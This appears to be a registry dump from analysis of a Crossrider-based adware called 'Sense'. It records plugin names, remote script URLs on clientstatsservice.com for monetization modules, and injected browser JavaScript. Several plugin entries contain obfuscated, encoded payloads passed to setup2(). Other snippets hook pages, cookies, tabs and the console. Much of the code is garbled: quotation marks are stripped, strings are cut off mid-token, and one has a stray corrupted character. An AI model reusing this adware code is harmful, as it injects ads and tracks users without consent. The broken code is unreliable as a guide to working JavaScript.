    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi["
    "Version" = "4"

    [HKCU\Software\Sense\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\Sense\Plugins\223]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Sense\Plugins\226]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\41]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\Sense\Plugins\72]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\Sense\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\Sense\Plugins\180]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2MDYwNDgxZDE5MDEwMjM3MTUxODQ4NTM0YTU3MDUwMTA2MTI1ZDViNDUwODBlMDY0MzAxMTQxYTBlMDU0NDBhMDUxODQyMTQ1YzEyMGYwNDU1NWY1ODQzMWYxMDE0NTA1YTJiMzUyYTM4M2EzZTI2MjAyYjIzMzEzODM2MzkyMDJmMmEzYjI2MzgyYjRjNWY1ODQzMjMxNDFmMDc1YTJiMzUyYTM4M2EzZTI2MjAyYjIzMzEzODM2MmIyNTNkMmEzYzIzMmEzMTM1MzY0YzQzNWY0MzAwMDcwMTQ3NTczNjM1MzYzZjNhMjEzMTM1M2QyZTJjMzgyYTM4MjYzNzMwMzgzZDJlMzYzNTUzNWI0NzQ0MTAwMjEyNWI1NDVjNDY1YTQ3NDQwNDUwNDc1ZDVhNWQ0NzViNGM0NDU2NTE0MTVkNWI0YzAxMDgxYzE2NWYzODJiMjkzYjI1MjYzZTI3M2IyNjIyMjYzNTI4M2EyNTMyM2MzNjNkMzg1MjFlMWMwMzExNTAyYTJkMjEzNTNiMzkzYTM4M2MyOTMwMjAzZDJlM2EzOTNkMmIzOTIxMzAyMDNkMzIyNzJmM2IzNTNjMjkyYTJkNDA0YjdlNjM0YjAyMDExOTA1MDEzNzE1MTg0ODUzNGE1NzA1MDEwNjEyMTQ0ZTQ1NDYwYjExMWU1YjA2MDQxZjFkMWI0NzA5MWEwMDVhMTM0YzE3MWMxYTU2NWM0NzViMDcxNzA0NTU0OTM1MzYyOTI3MjIyNjIxMzAyZTMwMmYzYjM1MjYzODM3MmQyYjIzMmIzNTRmNWM0NzViM2IxMzBmMDI0OTM1MzYyOTI3MjIyNjIxMzAyZTMwMmYzYjM1MzQzZDI1MmQyYzI2MzkyZjM2MzU1MzViNDc0NDEwMDIxMjU5NTQzNTJhMmUyNzNkMzEzNDI2MjMyZDJmMjczMjIwMjEyNzM1MmIyMzJkMzUyYTRiNDM1["

    [HKCU\Software\Sense\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\Sense\Plugins\2]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\102]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\Sense\Plugins\192]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI3ZTczNDcwZTFkMTkxMzNmMDQwNTU2NDA0NTQ0MDExOTE3MWE0YzQ2NWIxYjE2MTQxZjQwMDI0NDE3MDIxNTE3MDQwZjAxMDk0ZDA0MTMxZDViMDkwMTQ5NTg1YTUzNWE1OTU4NDQ0YTVkNDgwMzFlNDE0NjdjNjA1NjEyMTExMjE5MWUzNjE4MWE0YjRlNWE0NzBlMWQxOTEzMTk0YzQ2NWIxYjE2MTQxZjQwMDI0NDE3MDIxNTE3MDQwZjAxMDk0ZDA0MTMxZDViMDkwMTQ5NTg1YTUzNWE1OTU4NDQ0YTVkNDgwMzFlNDE0NjdjNjA1NjBhMDkxMzBlMDQwZDIzMTI0YjRlNWE1NDVmNWI0MTY5NGE1NjQ5NTQ1ODEzMDMxYjE5MGEwOTE3MDU1NjQwNDUzZDRiMGMwNzE5NTQzNDU4NzA0NTQ2NDk0ZDQxMDMxODA1MWQxNDAwMmMzYTRmNTk0YTU0MWUxZDE0MDEwOTFlNDMzYzE4MDAxMzQ1NGQ1NTU2MTE1YzUzNWE0ZTQ5NDk1YTFlNDY0ZTFkMTYwODFhMDAwNzEyMDAxNDM2MWUxNjA4MWYwZDUzNDA0NTQxMzYzMjIwMzgzOTNhMjcyODJjMjIyYzNmM2MyNjNmMmUzYzJlM2EzNTNjMmYzYzIzMzIzNjJiNWQ0NTRkNDk0YTUzNWE0NjU5NDQ0YTU1NTY1OTVkNTM0ZDBiNTI1NjcwMTg=', 'itzefimcjv'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\Sense\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\Sense\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\Sense\Plugins\38]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\246]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\Sense\Plugins\183]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\Sense\Installer]
    "osName" = "XP32"

    [HKCU\Software\Sense\Plugins\47]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\211]
    "Name" = "revizer_ws_dynamic_b2b_light_m"

    [HKCU\Software\Sense\Plugins\28]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\Sense\Plugins\1]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/base.js"

    [HKCU\Software\Sense\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\Sense\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\Sense\Plugins\177]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\Sense\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi["

    [HKCU\Software\Sense\Plugins\226]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Sense\Plugins\123]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NDdhNDUxYjFiMTUxNzM4MWMwMDRjNDk0NzUxMDcxNTEzMWQ1NDQzNDExYTA5MDcwYTE5MTM0MzAwMGQxODVlMGIxYTAxMGExNDQzMGQwMzAzNWMwZDAwNDAwODA5MTkwYjE0MWE1ZDBkMDA1MDAwMDEwNDBhNTEwZDAxMDgwMDFjMTMwZTA5MGIxZTQ4MDAxMjExMDYwNTVhMzIzMTJmM2MzYzM0MjAzZDI4MjMyODNjMzMzZDI2MjUyYzI2MjUzODMyNDgwMTBmMGIwYjFhMDEwYTE0NTA1NjRhMDIxYTA5MTgwYzBlMGIwMjFjNTE0ZDQzNTc0MzVmMjcyMTRmNDI2NjY3NTEwZjA3MWIxMTE0MzgxYzAwNGM0OTQ3NTEwNzE1MTMxZDFkNTY0MTVjMGUxZDFiMDQxZjE5NDAwMjBmMDU0YTFmMDYwZjBjMWU0MDBmMDExZTQ4MTkxYzRlMGUwMzFhMDkxNjA3NDkxOTFjNWUwNjBiMDcwODUzMTAxNTFjMWMxMjE1MDQwYTA5MWM1NTE0MDYwZDA4MDM1MDMxMzMyZDIxMjgyMDNjMzMyZTI5MmIzZTMxMjAzMjMxMzAyODIzMzIzMTRhMDMxMjFmMWYwNjBmMGMxZTUzNTQ0ODFmMGUxZDA0MDIwODAxMDExZTUzNTA1NzQzNWY1MTIxMmI0YzQwNjQ3YTQ1MDMwMzE0MDAwNDAwMjUwYTUxNWQ1MzVlNTM1NDQxNjQ0YzRlNTM0NzUxMTkwNDE1MTkwNzBmMGYxZjQ1NDk0ZjNhNDUwNDAwMTgwYjBiMTM1MTMyNmIxYQ==', 'lnsgsoagmn'); }"

    [HKCU\Software\Sense\Plugins\1]
    "Version" = "10"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\Sense\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2MjdkNWIwZDA2MWUxNTIzMDUxYjRhNGU1OTQ3MWExZTExMDY0ZDU4NDcxZDE3MTYwNjQ0MTYxZTE4MDcxODFkMTcwMjEzMWUwMDU4MWUxOTBlMWI1NjBmMDE0NTE2MTEyODE1MGY1YTEzMTY0ZDJiMjMzMDNlM2IyMTM1MmQyMDJkMjMyMTRiMTQwNTFiMDYxZDE3NTQzOTMwMzQyODMzMjEyNzJkMzczYjI4MzAyMjMyMjUzNzNkM2Q1ODJkMzUyNjI0MzgyNDNiMjYzMDIxMzczODNhMjUyMjM1MzczZDNkM2EyZDRjMjcyNDM2MzkyYzJiM2QyYzIxM2EyOTM3MmUyODI2MzUzNDIwNGYzNTNhMzUyNTM4M2IyNzJiMmMzNjJmMzcyOTM2MjczODJiMzcyNDNmMmYzYTI5NTU1YjYyN2Q1YjBkMDYxZTE1MDUyMjA1MDQ1NjQzNDU1MDAyMTEwMjA3MDQ1MjViNTYwYzFjMTkxMTU4MDQxZjA3MDQwOTBjMWMwZDA0MDIxMjU5MDExYTFmMGE1ZDAwMTY1OTA0MTAzNzE2MWU0YjE4MTk1YTM3MzEzMTIxMzgzMDI0MjYyZjNhM2YzMzRhMGIwNjBhMTcxNjE4NDMyNTIyMzUzNzMwMzAzNjI2MzgyYzM0MjIyMzJkMjYyNjJjMzY1NzNhMjkzNDI1MjcyNzJhMzczYjJlMjAyNDI4MjQzZDM2MjYyYzM2MzUzYTUwMzUyNTI5M2EzZDNhMzYyMzM2MjYzYjM2MzEyYjM3MjQzZjJmNTgyOTI4MzQzYTNiMmEzNjIwMjMyMTMzMjUyODI5MjQyOTNhM2MyYjI4MzMyODI4NGE1ODczNmM1MDFhMDkwMzEwMWUwNjNkMWQ0NzQ4NGE1NzQyNDU1YjYyNTQ1OTQ1NTI0ODEzMTMwNTAzMDExNzE4MDk1MDUwNDUyZDU1MDQwMDFiMDkxNTFiMDQn["

    [HKCU\Software\Sense\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)["

    [HKCU\Software\Sense\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p["

    [HKCU\Software\Sense\Plugins\39]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\Sense\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\Sense\Manifest]
    "ModeType" = "production"

    [HKCU\Software\Sense\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\Sense\Plugins\46]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\239]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NTYzNTEwNDA1MDAxYzJkMDcwMDRkNTA1MzRlMTkwMDE4MDg0ZjQzNDAwYjAwMWUwNzU5MGQ1NjE0MDcwZTA3MTIwNTE5MTA0MjE2MTAxODQwMTkxNzQzNDA0MzVjNDg1YTVkNWY1ZTRiNDIxYjA3NGU1NDdmNjU0ZDAyMDcxODAxMDczOTBhMTk0ZTU1NGE1MTA0MDUwMDFjMGI0ZjQzNDAwYjAwMWUwNzU5MGQ1NjE0MDcwZTA3MTIwNTE5MTA0MjE2MTAxODQwMTkxNzQzNDA0MzVjNDg1YTVkNWY1ZTRiNDIxYjA3NGU1NDdmNjU0ZDFhMWYxOTE2MWQwMjMxMTE0ZTU1NGE0MTVmNDg1ODY2NTg1NTRjNGY0ODA1MDkwMzAwMDUxYjE0MDA0ZDUwNTMzNzUzMTUwODBiNTczMTQzNjA1MzRjNTE1NDRlMTExYjAwMDYwNDE2MjYyMjU2NTY1ODU3MWIwNjA0MTcwMzA2NWEzMzBhMDMxNjVlNWQ0MzVjMDk0NTVjNGM0ZDRjNTI0YTA4NGM1NjA0MTkxYTE5MDUxYzAyMTYxZTJlMDcxOTFhMWMwODQ4NTA1MzRiMmUyYjJmMmEzYTNmM2MzODNhMjgzNDI2MzMzNDNjMmIyNzNlMmMzZjI0MzYzMzMxMzEzMzMwNGQ1MzQ3NTE1MzVjNDg0NTVjNWY1YTQzNWM0MTQ0NWM1ZjA4NTc0ZDYwMGU=', 'lojslqtlxu'); }"

    [HKCU\Software\Sense\Plugins\195]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKCU\Software\Sense\Plugins\93]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\Sense\Plugins\38]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IECallbacks.js"

    [HKCU\Software\Sense\Plugins\43]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\Sense\Plugins\35]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEAjax.js"
    "Name" = "IEAjax"

    [HKCU\Software\Sense\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,3"

    [HKCU\Software\Sense\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGE3ZDZmNGYxODAyMTUwMzNkMGIxZDU1NWM0ZDUyMWUxNTA3MTg0MzVlNTgxMTFhMDc1ODEyMDYxODFjMDMxMTBmMWUxODU4MDIxYzA1NTYwNjA0NDkxZTE2MjkwYzEyMDExNzVmMWQxNTFkNGYxMjBkMDAwNzBjMDMxNDAzNTAxODFlMTcwOTA1MTAxYTAwNDAxODAzMTMxMzNhMGM0NDEwMTUwNTRiMzMyMjI4Mzc1NTI2MmUzNDM0MjIyMzI1MzMzYTJjM2MyMzI4MzUzODMyMjkyODM3MzcyNjUzNWI2YzY0NTIxZTE1MDcxODBhMjQwNTBhNGY0YTU2NDMxYjFjMGQwMTA0NWM0MjVmMDExNjA0NDYwYTA0MDcwMzFmMTYxZjEyMWI0NjFhMWUxYTQ5MWEwMzU5MTIxNTM3MTQxMDFlMDg0MzFhMDUxMTRjMGMxNTAyMTgxMzFmMTMxMzVjMWIwMDBmMGIxYTBmMDYwNzUwMTQwMDBkMGIzODEzNWIwYzEyMTU0NzMwM2MzMDM1NGEzOTMyMzMyNDJlMjAzYjJiMzgzMzIzM2YyZjI1MzQzMTM3MzAzNTI4Mzk0ZjVjN2M2ODUxMTgxNTA0MTAwZjAzMzkxMjQzNDk0ODQwNDI1YjZjNGQ1MDU2NDE1MTFlMWMwMzAzMGYwZTExMWE0MzQ5NDgyMjUzMDQwZTAyMDAwNjA4MWQwZjViMmM3ZDFi', 'qwfmpvashy'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Installer]
    "ErrorsDomain" = "http://errors.clientstatsservice.com"

    [HKCU\Software\Sense\Plugins\233]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_2_m.js"

    [HKCU\Software\Sense\Installer]
    "DefaultBrowser" = "ie"

    [HKCU\Software\Sense\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\Sense\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\Sense\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Sense\Manifest]
    "Name" = "Sense"

    [HKCU\Software\Sense\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\Sense\Installer]
    "StatsDomain" = "http://stats.clientstatsservice.com"

    [HKCU\Software\Sense\Plugins\104]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\Sense\Plugins\28]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/initializer.js"

    [HKCU\Software\Sense\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\Sense\Plugins\233]
    "Version" = "5"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "93 54 26 30 2A E4 F8 FD F0 7E BD 36 98 11 71 E1"

    [HKCU\Software\Sense\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\Sense\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\Sense\Plugins\155]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars"

    [HKCU\Software\Sense\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\Sense\Plugins\9]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\22]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\226]
    "Name" = "set_campaign_id_m"

    [HKCU\Software\Sense\Plugins\233]
    "Name" = "revizer_p_dynamic_b2b_2_m"

    [HKCU\Software\Sense\Plugins\193]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n["

    [HKCU\Software\Sense\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"

    [HKCU\Software\Sense\Plugins\7]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/hooks.js"

    [HKCU\Software\Sense\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3YjQ3NGM0ZTU3NWEwZTExMTYwMzI0MTUwMDRjNGQ1ODQ0MGQxNjA3MDE1ZDQzNDExZTU2MDUxNzA2MDExYjE0NDIwNzE5MWUwOTRhMDEwMTE1MTU0MzA0MTYwZTA3MTYwMTAxMTgxNzE4NDAxZDBiNTkwNjBhMTIxZjA5MDkwMjRhMWIxNDAxMTAyYzJlMzgyZjNjMzgyYjM1MzcyYjM3MzQzNTMzM2QyMjNhMzkyYzI2MmMyZTQxMGQxZTA3MmMwZjExMGUxNjRjMzgzMzJkMjUzNzM1MzYzMDNhMzUyMjNlMzEzNjI4MzYzYTJjMzIzYzIyMzMzMTUxMTAwZjAxNWYyYzJlMjQzZTIxMjQyYjM0MmMyNjM2MjMzODM5M2QzMjJhMzkyYzI2MmMyZTQ1NDA2NDU3NTg0NjQ1NDAxYjA1MTMxYzFkMjIwYTBhNDc1ODUzNTMwZjE4MWEwNzBiNWM0YTRkMWEyZTA0MWUwYTA1MTIxNTNhMGIxZDE3MDg0MjFhMWIwYjA1MDEwYzVkMTIwODAxNDExNDBhMDIxNzRkMTkxMDExMGQxZDE0MGEwZjE1MTY1ZDFiMTQ1MzBkMWYxOTA4MGIwNzFmNGMwNDFlMGEwNTI3MzkzYTIxMjEzZTM0M2YzYzNlM2MyMzM3M2QyMDI0MjUzMzI3MzMyNzM5NDMwMzAzMDEzMzA1MWExYjFkNWIzYTNkMzAyMzI4M2YzZDI1MzEyMjIwMzAyYzMwMzczYzMxMzkzOTJiMjAzZDJjNTcwZjA1MGE0YTI3MzkyNjMwM2MyMjM0M2UyNzMzM2QzNDNhMzcyMDM0MzUzMzI3MzMyNzM5NDc0ZTc5NTE0NzRjNGU1NTA4MGExMDA1MWExZjJlMDg0YzRkNTg1NzU1NTA1ZjdiNDc0YzRlNTc1YTEwMDAxMDA3MTgwNDBkMDI1NTQyNDYzZTQwMDAxOTA4MWMxZTFlMTYè´”["

    [HKCU\Software\Sense\Installer]
    "zdata" = "eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0="

    [HKCU\Software\Sense\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){3"

    [HKCU\Software\Sense\Plugins\230]
    "Name" = "revizer_ws_dynamic_b2b_2_m"

    [HKCU\Software\Sense\Plugins\14]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\Sense\Plugins\246]
    "Version" = "10"

    [HKCU\Software\Sense\Plugins\47]
